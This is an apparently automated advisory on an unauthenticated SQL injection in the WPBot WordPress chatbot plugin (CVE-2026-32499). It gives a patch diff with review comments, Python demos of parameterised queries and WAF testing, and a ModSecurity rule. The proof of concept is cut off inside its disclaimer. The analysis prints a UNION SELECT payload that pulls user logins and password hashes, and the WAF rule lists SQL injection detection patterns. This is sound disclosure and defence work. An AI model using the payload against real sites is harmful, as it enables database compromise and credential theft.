Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 30, 2026

CVE-2026-32499: WPBot – AI ChatBot for Live Support, Lead Generation, AI Services <= 7.7.9 – Unauthenticated SQL Injection (chatbot)

Plugin: chatbot
Severity: High (CVSS 7.5)
CWE: 89
Vulnerable Version: 7.7.9
Patched Version: 7.8.0
Disclosed: March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-32499:
The WPBot plugin for WordPress contains an unauthenticated SQL injection vulnerability in the wpbo_search_site_pagination() function. This vulnerability affects versions up to and including 7.7.9, allowing attackers to execute arbitrary SQL queries against the WordPress database without authentication. The CVSS score of 7.5 reflects the high impact of successful exploitation.

Atomic Edge research identified the root cause in the wpbo_search_site_pagination() function within chatbot/qcld-wpwbot-search.php. The function directly concatenated user-controlled parameters into SQL queries without proper escaping or prepared statements. Specifically, the $post_type and $searchkeyword variables (lines 332-347) were directly interpolated into SQL strings. The $post_type parameter passed through sanitize_text_field() but lacked proper validation against allowed values, while $searchkeyword originated from user-supplied $_POST['keyword'] after minimal processing.

The exploitation method targets the WordPress AJAX endpoint /wp-admin/admin-ajax.php with the action parameter set to wpbo_search_site_pagination. Attackers can send POST requests containing malicious SQL payloads in the type parameter (for $post_type) or keyword parameter (for $searchkeyword). For example, setting type to ‘post’) UNION SELECT user_login,user_pass FROM wp_users–‘ would extract user credentials. The absence of nonce verification in vulnerable versions allows unauthenticated exploitation.

The patch introduces multiple security layers. It adds nonce verification using wp_verify_nonce() with 'wpbot_search_nonce' (lines 323-326). The code replaces direct string concatenation with prepared statements using $wpdb->prepare() (lines 365-388). Input validation restricts $post_type to allowed values ('post', 'page', 'product') using in_array() (lines 336-339). The patch converts $page to integer via absint() and validates $orderby against a whitelist. These changes eliminate SQL injection by separating data from query structure.
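The following is an added example, not code from the WPBot plugin or from the Atomic Edge advisory. It restates the patch's defensive pattern in Python so it can be run offline: a fixed allowlist for the post type, absint() for the page number, an orderby-to-column map so that the only text interpolated into ORDER BY comes from a constant, wildcard escaping for LIKE in the style of $wpdb->esc_like(), and bound parameters for everything else. SQLite stands in for MySQL, a regexp() function is registered to emulate MySQL's case-insensitive REGEXP, and the wp_posts rows are constructed for the demonstration. It also escapes the keyword in the REGEXP branch with re.escape(), which is the one step the 7.8.0 patch does not perform; the helper names (absint, escape_like, build_search_query, run_search) are this example's own.

```python
import re
import sqlite3

# Allowlists mirroring the 7.8.0 patch: a fixed set of post types and an
# orderby -> column map, so nothing user-controlled ever reaches ORDER BY.
ALLOWED_POST_TYPES = ("post", "page", "product")
ORDERBY_COLUMNS = {"title": "post_title", "date": "post_date", "modified": "post_modified"}


def absint(value, default=0):
    """Stand-in for WordPress absint(): non-negative integer, or the default."""
    try:
        return abs(int(value))
    except (TypeError, ValueError):
        return default


def escape_like(term: str) -> str:
    """Stand-in for $wpdb->esc_like(): make %, _ and backslash literal in a LIKE pattern."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def build_search_query(post_type, keyword, page=0, per_page=5,
                       orderby="none", order="ASC", advanced=False):
    """Return (sql, params). Data always travels as bound parameters; the only
    interpolated fragments come from the constant maps above."""
    if post_type not in ALLOWED_POST_TYPES:
        post_type = "post"                        # patch behaviour: silent fallback
    limit = absint(per_page) or 5
    offset = absint(page) * limit
    order = str(order).upper()
    if order not in ("ASC", "DESC"):
        order = "ASC"
    if orderby in ORDERBY_COLUMNS:
        order_clause = f"ORDER BY {ORDERBY_COLUMNS[orderby]} {order}"
    else:                                         # 'none', 'rand' or anything unexpected
        order_clause = "ORDER BY ID DESC"
    if advanced:
        # Whole-word REGEXP search; re.escape() is the step the patch omits.
        pattern = r"\b" + re.escape(keyword) + r"\b"
        predicate = "(post_title REGEXP ? OR post_content REGEXP ?)"
        params = [post_type, pattern, pattern]
    else:
        predicate = "post_title LIKE ? ESCAPE '\\'"
        params = [post_type, "%" + escape_like(keyword) + "%"]
    sql = ("SELECT ID, post_title FROM wp_posts WHERE post_type = ? "
           f"AND post_status = 'publish' AND {predicate} {order_clause} LIMIT ? OFFSET ?")
    return sql, params + [limit, offset]


# Constructed wp_posts rows for the demonstration, not data from any real site.
SAMPLE_ROWS = [
    (1, "post", "publish", "Pricing update", "New 10% discount", "2026-01-01", "2026-01-01"),
    (2, "page", "publish", "About us", "Who we are", "2026-01-02", "2026-01-02"),
    (3, "post", "draft", "Unpublished pricing", "internal", "2026-01-03", "2026-01-03"),
    (4, "product", "publish", "Widget 100%", "Best widget", "2026-01-04", "2026-01-04"),
    (5, "post", "publish", "Pricing FAQ", "Common questions", "2026-01-05", "2026-01-05"),
]


def run_search(**kwargs):
    """Execute the built query against an in-memory SQLite copy of wp_posts and
    return the matching titles. SQLite has no REGEXP operator by default, so one
    is registered that behaves like MySQL's (case-insensitive)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function(
        "regexp", 2,
        lambda pat, text: int(text is not None and re.search(pat, text, re.I) is not None))
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_type TEXT, post_status TEXT, "
                 "post_title TEXT, post_content TEXT, post_date TEXT, post_modified TEXT)")
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    sql, params = build_search_query(**kwargs)
    titles = [row[1] for row in conn.execute(sql, params)]
    conn.close()
    return titles


if __name__ == "__main__":
    print(run_search(post_type="post", keyword="pricing"))
    print(run_search(post_type="post') UNION SELECT 1,2--", keyword="pricing"))  # allowlist fallback
    print(run_search(post_type="post", keyword="%"))                              # wildcard made literal
    print(run_search(post_type="post", keyword="pric.ng", advanced=True))          # metachar made literal
```

The point of the example is that the injected `type` value never changes the query's structure: it fails the allowlist and is replaced, a `%` keyword matches only a literal percent sign, and a `.` in the advanced branch is a literal dot rather than a regex wildcard. The only fragment built by string interpolation, the ORDER BY clause, is taken from ORDERBY_COLUMNS, which is the same reasoning that makes the patch's `ORDER BY {$orderby} {$order}` acceptable after its whitelist.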

Successful exploitation enables complete database compromise. Attackers can extract sensitive information including user credentials, personal data, plugin configurations, and WooCommerce customer records. The vulnerability allows data exfiltration, potential privilege escalation through admin credential theft, and complete database manipulation. Atomic Edge analysis confirms this represents a critical information disclosure risk for affected WordPress installations.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/chatbot/qcld-wpwbot-search.php
+++ b/chatbot/qcld-wpwbot-search.php
@@ -320,9 +320,23 @@
 function wpbo_search_site_pagination() {
 	global $wpdb;

-	$keyword           = sanitize_text_field( $_POST['keyword'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
-	$post_type         = sanitize_text_field( $_POST['type'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
-	$page              = sanitize_text_field( $_POST['page'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+	// Verify nonce for security
+	if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( $_POST['nonce'], 'wpbot_search_nonce' ) ) {
+		wp_send_json_error( array( 'message' => 'Security check failed' ) );
+		wp_die();
+	}
+
+	// Sanitize and validate inputs
+	$keyword           = isset( $_POST['keyword'] ) ? sanitize_text_field( $_POST['keyword'] ) : '';
+	$post_type         = isset( $_POST['type'] ) ? sanitize_text_field( $_POST['type'] ) : 'post';
+	$page              = isset( $_POST['page'] ) ? absint( $_POST['page'] ) : 0;
+
+	// Validate post type against allowed types
+	$allowed_post_types = array( 'post', 'page', 'product' );
+	if ( ! in_array( $post_type, $allowed_post_types, true ) ) {
+		$post_type = 'post';
+	}
+
 	$enable_post_types = get_option( 'wppt_post_types' );
 	$load_more         = maybe_unserialize( get_option( 'qlcd_wp_chatbot_load_more' ) );

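Review bot: the hard-coded `$allowed_post_types = array( 'post', 'page', 'product' )` ignores the `wppt_post_types` option that is read two lines later into `$enable_post_types`, so a site that enabled a custom post type for search now silently gets `post` results instead of an error; derive the allowlist from that option (checked against `get_post_types()`) rather than a fixed list. Also, `$_POST['nonce']` is passed to `wp_verify_nonce()` unslashed and unsanitized; the WordPress convention is `sanitize_text_field( wp_unslash( $_POST['nonce'] ) )`. Because this is a front-end chatbot endpoint, the `wpbot_search_nonce` nonce must also be exposed to the unauthenticated page (for example via `wp_localize_script`), which this diff does not show; without that, the search breaks for every visitor.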
@@ -332,14 +346,17 @@
 	if ( is_array( $load_more ) ) {
 		$load_more = $load_more[ array_rand( $load_more ) ];
 	}
-	$searchlimit = ( get_option( 'wppt_number_of_result' ) == '' ? '5' : get_option( 'wppt_number_of_result' ) );
+	$searchlimit = ( get_option( 'wppt_number_of_result' ) == '' ? 5 : absint( get_option( 'wppt_number_of_result' ) ) );
 	$orderby     = ( get_option( 'wppt_result_orderby' ) == '' ? 'none' : get_option( 'wppt_result_orderby' ) );
 	$order       = ( get_option( 'wppt_result_order' ) == '' ? 'ASC' : get_option( 'wppt_result_order' ) );
 	$thumb       = ( get_option( 'wpbot_search_image_size' ) ? get_option( 'wpbot_search_image_size' ) : 'thumbnail' );
 	// order by setup
 	$new_window = get_option( 'wpbot_search_result_new_window' );

-	$total_items = get_option( 'wppt_number_of_result' );
+	$total_items = absint( get_option( 'wppt_number_of_result' ) );
+	if ( $total_items < 1 ) {
+		$total_items = 5;
+	}

 	$searchkeyword = qcld_wpbot_modified_keyword( $keyword );

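Review bot: `$searchlimit` is still computed (now through `absint()`) but nothing in the patched function uses it once the LIMIT moves into the prepared statements, and `$total_items` carries the same option with the same default of 5, so drop `$searchlimit`. `$orderby` and `$order` are still taken verbatim from the options here and are only validated later, inside the `if ( ! empty( $total_results ) )` branch; validating them once at this point would also cover the `WP_Query` fallback branch.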
@@ -347,19 +364,42 @@
 	$response['status'] = 'fail';
 	$response['html']   = '';

-	// $sql = "SELECT * FROM ". $wpdb->prefix."posts where post_type in ('".$post_type."') and post_status='publish' and ((post_title REGEXP '\b".$searchkeyword."\b'))";
+	// Use prepared statements to prevent SQL injection
 	if ( get_option( 'active_advance_query' ) != '1' ) {
-		$sql   = 'SELECT * FROM ' . $wpdb->prefix . "posts where post_type in ('" . $post_type . "') and post_status='publish' and ((post_title LIKE '%" . $searchkeyword . "%')) order by ID DESC";
-		$limit = ' Limit 0, ' . $searchlimit;
+		// Simple query - search in post_title only
+		$sql = $wpdb->prepare(
+			"SELECT * FROM {$wpdb->prefix}posts
+			WHERE post_type = %s
+			AND post_status = 'publish'
+			AND post_title LIKE %s
+			ORDER BY ID DESC",
+			$post_type,
+			'%' . $wpdb->esc_like( $searchkeyword ) . '%'
+		);
 	} else {
-		// advance query building
-		$sql   = 'SELECT * FROM ' . $wpdb->prefix . "posts where post_type in ('" . $post_type . "') and post_status='publish' and ((post_title REGEXP '\b" . $searchkeyword . "\b') or (post_content REGEXP '\b" . $searchkeyword . "\b')) order by ID DESC";
-		$limit = ' Limit 0, ' . $searchlimit;
+		// Advanced query - search in both post_title and post_content
+		$sql = $wpdb->prepare(
+			"SELECT * FROM {$wpdb->prefix}posts
+			WHERE post_type = %s
+			AND post_status = 'publish'
+			AND (post_title REGEXP %s OR post_content REGEXP %s)
+			ORDER BY ID DESC",
+			$post_type,
+			'[[:<:]]' . $searchkeyword . '[[:>:]]',
+			'[[:<:]]' . $searchkeyword . '[[:>:]]'
+		);
 	}
+
 	$total_results = $wpdb->get_results( $sql );

 	if ( ! empty( $total_results ) ) {

+		// Validate and sanitize orderby parameter
+		$valid_orderby = array( 'title', 'date', 'modified', 'none', 'rand' );
+		if ( ! in_array( $orderby, $valid_orderby, true ) ) {
+			$orderby = 'none';
+		}
+
 		if ( $orderby == 'title' ) {
 			$orderby = 'post_title';
 		}
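Review bot: the advanced branch interpolates `$searchkeyword` into the REGEXP pattern without escaping metacharacters, so a keyword containing `(`, `*` or `|` either aborts the query with a regex error or breaks out of the intended whole-word match; escape it (the equivalent of `preg_quote()` for the server's regex dialect) before wrapping it in the boundary markers. The LIKE branch does this correctly with `$wpdb->esc_like()`. Note also that `[[:<:]]`/`[[:>:]]` are Henry Spencer word-boundary markers that MySQL 8.0.4+ (ICU) does not accept, whereas the old query used `\b`; confirm against the supported MySQL/MariaDB versions before shipping.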
@@ -370,20 +410,86 @@
 			$orderby = 'post_modified';
 		}

-		if ( $orderby != 'none' or $orderby != 'rand' ) {
-			$sql .= " order by $orderby $order";
+		// Validate order parameter
+		$order = strtoupper( $order );
+		if ( ! in_array( $order, array( 'ASC', 'DESC' ), true ) ) {
+			$order = 'ASC';
+		}
+
+		// Build query with pagination
+		$offset = absint( $total_items * $page );
+
+		if ( get_option( 'active_advance_query' ) != '1' ) {
+			if ( $orderby != 'none' && $orderby != 'rand' ) {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND post_title LIKE %s
+					ORDER BY {$orderby} {$order}
+					LIMIT %d, %d",
+					$post_type,
+					'%' . $wpdb->esc_like( $searchkeyword ) . '%',
+					$offset,
+					$total_items
+				);
+			} else {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND post_title LIKE %s
+					ORDER BY ID DESC
+					LIMIT %d, %d",
+					$post_type,
+					'%' . $wpdb->esc_like( $searchkeyword ) . '%',
+					$offset,
+					$total_items
+				);
+			}
+		} else {
+			if ( $orderby != 'none' && $orderby != 'rand' ) {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND (post_title REGEXP %s OR post_content REGEXP %s)
+					ORDER BY {$orderby} {$order}
+					LIMIT %d, %d",
+					$post_type,
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					$offset,
+					$total_items
+				);
+			} else {
+				$sql = $wpdb->prepare(
+					"SELECT * FROM {$wpdb->prefix}posts
+					WHERE post_type = %s
+					AND post_status = 'publish'
+					AND (post_title REGEXP %s OR post_content REGEXP %s)
+					ORDER BY ID DESC
+					LIMIT %d, %d",
+					$post_type,
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					'[[:<:]]' . $searchkeyword . '[[:>:]]',
+					$offset,
+					$total_items
+				);
+			}
 		}
-		$limit = ' Limit ' . ( $total_items * $page ) . ", $total_items";

-		$results = $wpdb->get_results( $sql . $limit );
+		$results = $wpdb->get_results( $sql );
 	} else {
 		if ( class_exists( 'SitePress' ) ) {
 			global $sitepress;
-			$selected_lan = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$selected_lan = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
 			$selected_lan = explode( '_', $selected_lan );
-			$sitepress->switch_lang( $selected_lan[0], true );
-
+			if ( ! empty( $selected_lan[0] ) ) {
+				$sitepress->switch_lang( $selected_lan[0], true );
+			}
 		}
+
 		$query_arg = array(
 			'post_type'      => $post_type,
 			'post_status'    => 'publish',
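Review bot: the four `$wpdb->prepare()` calls differ only in the ORDER BY clause and the search predicate; compute `$order_clause` once (the `{$orderby} {$order}` interpolation is acceptable only because both values were just mapped to a fixed set, so say so in a `// phpcs:ignore` comment) and build a single prepared query, otherwise future edits will drift between the copies. The `!= 'none' && != 'rand'` fix is correct: the old `or` condition was always true.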
@@ -392,16 +498,18 @@
 			'paged'          => ( $page + 1 ),
 			'orderby'        => $orderby,
 		);
+
 		if ( class_exists( 'SitePress' ) ) {
 			global $sitepress;
-			$selected_lan = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$selected_lan = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
 			$selected_lan = explode( '_', $selected_lan );
-			$sitepress->switch_lang( $selected_lan[0], true );
-
+			if ( ! empty( $selected_lan[0] ) ) {
+				$sitepress->switch_lang( $selected_lan[0], true );
+			}
 		}

 		$query_arg['suppress_filters'] = true;
-		if ( $orderby != 'none' or $orderby != 'rand' ) {
+		if ( $orderby != 'none' && $orderby != 'rand' ) {
 			$query_arg['order'] = $order;
 		}

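Review bot: the `or` to `&&` fix is right, the previous condition was always true so `order` was set unconditionally. The `SitePress` language switch block is now a verbatim copy of the one in the branch above, including the repeated `$_POST['language']` read; a small helper would remove the duplication.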
@@ -410,7 +518,6 @@
 				'post_type'   => $post_type,
 				'post_status' => 'publish',
 				's'           => stripslashes( $keyword ),
-
 			)
 		);
 		$resultss      = new WP_Query( $query_arg );
@@ -419,88 +526,86 @@
 		$results       = $resultss->posts;
 	}

-
-
-
-
 	if ( ! empty( $total_results ) ) {

-		$selected_lan     = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
+		$selected_lan     = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
 		$urlss            = get_option( 'wpbotml_url_urls' ) ? get_option( 'wpbotml_url_urls' ) : '';
 		$imagesize        = ( get_option( 'wpbot_search_image_size' ) != '' ? get_option( 'wpbot_search_image_size' ) : 'thumbnail' );

-
 		$response['html'] .= '<div class="wpb-search-result">';

-				foreach ( $total_results as $result ) {
+		foreach ( $total_results as $result ) {

-					if ( $result->post_type == 'product' ) {
-						if ( ! class_exists( 'WooCommerce' ) ) {
-							continue;
-						}
-					}
+			if ( $result->post_type == 'product' ) {
+				if ( ! class_exists( 'WooCommerce' ) ) {
+					continue;
+				}
+			}

-					$featured_img_url = get_the_post_thumbnail_url( $result->ID, $thumb );
-					$excerpt = '';
-					if ( isset( $result->ID ) ) {
-						$post_obj = get_post( $result->ID );
-						if ( $post_obj ) {
-							if ( has_excerpt( $result->ID ) ) {
-								$excerpt = get_the_excerpt( $result->ID );
-							} else {
-								$content = $post_obj->post_content;
-
-								// Remove ALL WPBakery shortcodes (paired + self-closing)
-								$content = preg_replace( '/[vc_[^]]*](.*?)[/vc_[^]]*]/s', '$1', $content ); // paired
-								$content = preg_replace( '/[vc_[^]]*]/s', '', $content ); // self-closing
-								$content = preg_replace('/[/?[w-]+[^]]*]/', '', $content);
-								// Extra: remove any leftover [] shortcodes (just in case)
-								$content = strip_shortcodes( $content );
-
-								// Run through normal WP content filters
-								$content_filtered = apply_filters( 'the_content', $content );
-
-								// Strip HTML tags, then trim
-								$excerpt = wp_trim_words( wp_strip_all_tags( $content_filtered ), 20, '...' );
-							}
-						}
-					}
-
-
-					$response['html'] .= '<div class="wpbot_card_wraper">';
-					$response['html'] .= '<div class="wpbot_card_image ' . ( $result->post_type == 'product' ? 'wp-chatbot-product' : '' ) . ' ' . ( $featured_img_url == '' ? 'wpbot_card_image_saas' : '' ) . '"><a href="' . esc_url( get_permalink( $result->ID ) ) . '" ' . ( $new_window == 1 ? 'target="_blank"' : '' ) . ' ' . ( $result->post_type == 'product' ? 'wp-chatbot-pid="' . $result->ID . '"' : '' ) . '>';
-					if ( $featured_img_url != '' ) {
-						$response['html'] .= '<img src="' . esc_url_raw( $featured_img_url ) . '" />';
-					}
+			$featured_img_url = get_the_post_thumbnail_url( $result->ID, $thumb );
+			$excerpt = '';
+			if ( isset( $result->ID ) ) {
+				$post_obj = get_post( $result->ID );
+				if ( $post_obj ) {
+					if ( has_excerpt( $result->ID ) ) {
+						$excerpt = get_the_excerpt( $result->ID );
+					} else {
+						$content = $post_obj->post_content;
+
+						// Remove ALL WPBakery shortcodes (paired + self-closing)
+						$content = preg_replace( '/[vc_[^]]*](.*?)[/vc_[^]]*]/s', '$1', $content ); // paired
+						$content = preg_replace( '/[vc_[^]]*]/s', '', $content ); // self-closing
+						$content = preg_replace('/[/?[w-]+[^]]*]/', '', $content);
+						// Extra: remove any leftover [] shortcodes (just in case)
+						$content = strip_shortcodes( $content );

-					$response['html'] .= '<div class="wpbot_card_caption ' . ( $featured_img_url == '' ? 'wpbot_card_caption_saas' : '' ) . '">';
-					$response['html'] .= '<p class="wpbot_card_caption_title"><span style="padding: 0 5px;color: #1d73b4;display: inline-block;margin: 0 5px 0 0;width: 18px;height: 18px;border-radius: 50%;font-size: 20px;line-height: 22px;"> ✓ </span> ' . esc_html( $result->post_title ) . '</p>';
-					$response['html'] .= '<p class="wpbot_card_description">' . esc_html( $excerpt ) . '</p>';
-					if ( $result->post_type == 'product' ) {
-						if ( class_exists( 'WooCommerce' ) ) {
-							$product           = wc_get_product( $result->ID );
-							$response['html'] .= '<p class="wpbot_product_price">' . get_woocommerce_currency_symbol() . $product->get_price_html() . '</p>';
-						}
+						// Run through normal WP content filters
+						$content_filtered = apply_filters( 'the_content', $content );
+
+						// Strip HTML tags, then trim
+						$excerpt = wp_trim_words( wp_strip_all_tags( $content_filtered ), 20, '...' );
 					}
-					$response['html'] .= '</div>';
-					$response['html'] .= '</a></div>';
-					$response['html'] .= '</div>';
-
 				}
-
+			}
+
+
+			$response['html'] .= '<div class="wpbot_card_wraper">';
+			$response['html'] .= '<div class="wpbot_card_image ' . ( $result->post_type == 'product' ? 'wp-chatbot-product' : '' ) . ' ' . ( $featured_img_url == '' ? 'wpbot_card_image_saas' : '' ) . '"><a href="' . esc_url( get_permalink( $result->ID ) ) . '" ' . ( $new_window == 1 ? 'target="_blank"' : '' ) . ' ' . ( $result->post_type == 'product' ? 'wp-chatbot-pid="' . absint( $result->ID ) . '"' : '' ) . '>';
+			if ( $featured_img_url != '' ) {
+				$response['html'] .= '<img src="' . esc_url_raw( $featured_img_url ) . '" />';
+			}
+
+			$response['html'] .= '<div class="wpbot_card_caption ' . ( $featured_img_url == '' ? 'wpbot_card_caption_saas' : '' ) . '">';
+			$response['html'] .= '<p class="wpbot_card_caption_title"><span style="padding: 0 5px;color: #1d73b4;display: inline-block;margin: 0 5px 0 0;width: 18px;height: 18px;border-radius: 50%;font-size: 20px;line-height: 22px;"> ✓ </span> ' . esc_html( $result->post_title ) . '</p>';
+			$response['html'] .= '<p class="wpbot_card_description">' . esc_html( $excerpt ) . '</p>';
+			if ( $result->post_type == 'product' ) {
+				if ( class_exists( 'WooCommerce' ) ) {
+					$product           = wc_get_product( $result->ID );
+					$response['html'] .= '<p class="wpbot_product_price">' . get_woocommerce_currency_symbol() . $product->get_price_html() . '</p>';
+				}
+			}
+			$response['html'] .= '</div>';
+			$response['html'] .= '</a></div>';
+			$response['html'] .= '</div>';
+
+		}
+

 		$response['html']  .= '</div>';
 		$response['status'] = 'success';

 	}
-		wp_reset_query();
+	wp_reset_query();

 	if ( $response['status'] != 'success' ) {
 		$texts            = maybe_unserialize( get_option( 'qlcd_wp_chatbot_no_result' ) );
-		$selected_lan     = sanitize_text_field( $_POST['language'] );// phpcs:ignore WordPress.Security.NonceVerification.Missing
-		$texts            = str_replace( "'", "'", $texts[ $selected_lan ][0] );
-		$response['html'] = array( $texts );
-
+		$selected_lan     = isset( $_POST['language'] ) ? sanitize_text_field( $_POST['language'] ) : '';
+		if ( ! empty( $texts ) && is_array( $texts ) && isset( $texts[ $selected_lan ][0] ) ) {
+			$texts            = str_replace( "'", "'", $texts[ $selected_lan ][0] );
+			$response['html'] = array( $texts );
+		} else {
+			$response['html'] = array( 'No results found' );
+		}
 	}
 	wp_send_json( $response );
 	die();
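Review bot: `wc_get_product()` returns `false` for an ID that is not a product, and `$product->get_price_html()` is called on the result unguarded; check the return value first. The three `preg_replace()` patterns for WPBakery shortcodes (`'/[vc_[^]]*](.*?)[/vc_[^]]*]/s'` and the two after it) show no escaping on the square brackets, which makes them malformed character classes rather than shortcode matchers; if this is how the file reads and not an artifact of the diff rendering, they need `\[` and `\]`. In the no-result branch, `str_replace( "'", "'", ... )` replaces a character with itself and can go, while the new `isset( $texts[ $selected_lan ][0] )` guard correctly removes the undefined-index notice the old code produced.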
--- a/chatbot/qcld-wpwbot.php
+++ b/chatbot/qcld-wpwbot.php
@@ -4,7 +4,7 @@
  * Plugin URI: https://wordpress.org/plugins/chatbot/
  * Description: ChatBot is a native WordPress ChatBot plugin to provide live chat support and lead generation
  * Donate link: https://www.wpbot.pro/
- * Version: 7.7.9
+ * Version: 7.8.0
  * @author    QuantumCloud
  * Author: ChatBot for WordPress - WPBot
  * Author URI: https://www.wpbot.pro/
@@ -41,7 +41,7 @@
 }

 if ( ! defined( 'QCLD_wpCHATBOT_VERSION' ) ) {
-    define('QCLD_wpCHATBOT_VERSION', '7.7.9');
+    define('QCLD_wpCHATBOT_VERSION', '7.8.0');
 }
 if ( ! defined( 'QCLD_wpCHATBOT_REQUIRED_wpCOMMERCE_VERSION' ) ) {
     define('QCLD_wpCHATBOT_REQUIRED_wpCOMMERCE_VERSION', 2.2);

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-32499
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:10032499,phase:2,deny,status:403,chain,msg:'CVE-2026-32499 - WPBot SQL Injection via AJAX',severity:'CRITICAL',tag:'CVE-2026-32499',tag:'WordPress',tag:'WPBot',tag:'SQLi'"
  SecRule ARGS_POST:action "@streq wpbo_search_site_pagination" "chain"
    SecRule ARGS_POST:type "@rx (?i)(?:union[\s(]+select|select[\s(]+.*from|insert[\s(]+into|update[\s(]+.*set|delete[\s(]+from|drop[\s(]+table|create[\s(]+table|exec(?:ute)?[\s(]+|load_file[\s(]*\(|into[\s(]+(?:out|dump)file|benchmark[\s(]*\(|sleep[\s(]*\(|waitfor[\s(]+delay|pg_sleep[\s(]*\(|\b(?:or|xor)\b[\s(]*.*[=<>]+|--|#|/\*|\*/|[;'])" \
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

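An added example, not part of the Atomic Edge rule set: a small Python harness that replays the rule's logic over constructed POST bodies so a defender can see what it blocks before deploying it. The regular expression is the rule's pattern with its backslashes restored; the transformation chain (t:urlDecodeUni, t:htmlEntityDecode, t:lowercase) is approximated with the standard library, and the sample bodies are made up for the test. The rule as published inspects only the `type` argument, while the analysis above names `keyword` as the second injection point, so the checker takes the inspected argument list as a parameter and compares the published form with an extended one; the names rule_fires, transform and evaluate are this example's own.

```python
import html
import re
from urllib.parse import unquote

# The rule's @rx pattern with the stripped backslashes restored (\s, \(, \b, /\*).
SQLI_RX = re.compile(
    r"(?i)(?:union[\s(]+select|select[\s(]+.*from|insert[\s(]+into|"
    r"update[\s(]+.*set|delete[\s(]+from|drop[\s(]+table|create[\s(]+table|"
    r"exec(?:ute)?[\s(]+|load_file[\s(]*\(|into[\s(]+(?:out|dump)file|"
    r"benchmark[\s(]*\(|sleep[\s(]*\(|waitfor[\s(]+delay|pg_sleep[\s(]*\(|"
    r"\b(?:or|xor)\b[\s(]*.*[=<>]+|--|#|/\*|\*/|[;'])"
)

RULE_URI = "/wp-admin/admin-ajax.php"
RULE_ACTION = "wpbo_search_site_pagination"


def transform(value: str) -> str:
    """Approximate t:urlDecodeUni,t:htmlEntityDecode,t:lowercase with the stdlib
    (unquote() does not handle the %uXXXX form that urlDecodeUni accepts)."""
    return html.unescape(unquote(value)).lower()


def rule_fires(uri: str, args: dict, inspected=("type",)) -> bool:
    """True when the chained rule would deny the request. `inspected` lists the
    ARGS_POST names the last chain link examines; the published rule uses `type` only."""
    if uri != RULE_URI:                       # @streq on REQUEST_URI
        return False
    if args.get("action") != RULE_ACTION:     # @streq on ARGS_POST:action
        return False
    return any(SQLI_RX.search(transform(args.get(name, ""))) for name in inspected)


# Constructed sample POST bodies for the demonstration, not captured traffic.
SAMPLES = {
    "benign": {"action": RULE_ACTION, "type": "post", "keyword": "pricing", "page": "0"},
    "encoded_type": {"action": RULE_ACTION, "type": "post%27%29%20UNION%20SELECT%201%2C2--", "keyword": "x"},
    "other_action": {"action": "heartbeat", "type": "x') union select 1,2--"},
    "in_keyword": {"action": RULE_ACTION, "type": "post", "keyword": "x') union select 1,2--"},
    "apostrophe": {"action": RULE_ACTION, "type": "post", "keyword": "don't"},
}


def evaluate(inspected=("type",)) -> dict:
    """Run every sample through the rule and report which would be denied."""
    return {name: rule_fires(RULE_URI, args, inspected) for name, args in SAMPLES.items()}


if __name__ == "__main__":
    for label, inspected in (("as published", ("type",)), ("type+keyword", ("type", "keyword"))):
        print(label, evaluate(inspected))
```

Two things the run makes visible. First, the URL-encoded payload in `type` is caught because the decoding transformations run before the match, while the same text in `keyword` passes the published rule untouched; adding `ARGS_POST:keyword` to the last chain link closes that gap. Second, the pattern's trailing `[;']` alternative means any apostrophe triggers it, which is harmless for `type` (legitimate values are `post`, `page`, `product`) but will block ordinary searches such as "don't" once `keyword` is inspected, so a keyword-side rule needs a narrower pattern. Separately, `REQUEST_URI` in ModSecurity includes the query string, so `@streq` only matches the bare path; `REQUEST_FILENAME` with `@endsWith /wp-admin/admin-ajax.php` is the more robust anchor.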
Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
